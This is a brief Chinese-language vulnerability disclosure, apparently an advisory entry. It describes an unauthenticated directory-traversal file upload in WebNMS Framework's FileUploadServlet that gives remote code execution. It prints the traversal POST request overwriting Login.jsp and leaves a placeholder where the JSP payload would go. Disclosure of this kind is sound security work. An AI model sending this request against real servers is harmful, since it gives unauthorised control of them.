WebNMS 是一个业界领先的用于构建网络管理应用的架构。上传功能存在目录遍历及远程代码执行漏洞。
FileUploadServlet允许未登录上传JSP文件。提交如下 POST 请求:
POST /servlets/FileUploadServlet?fileName=…/jsp/Login.jsp HTTP/1.1
<JSP payload here>
下载官方Windows试用版软件测试通过:
http://www.webnms.com/webnms/14107380/WebNMS_Framework_5_STD_Windows.exe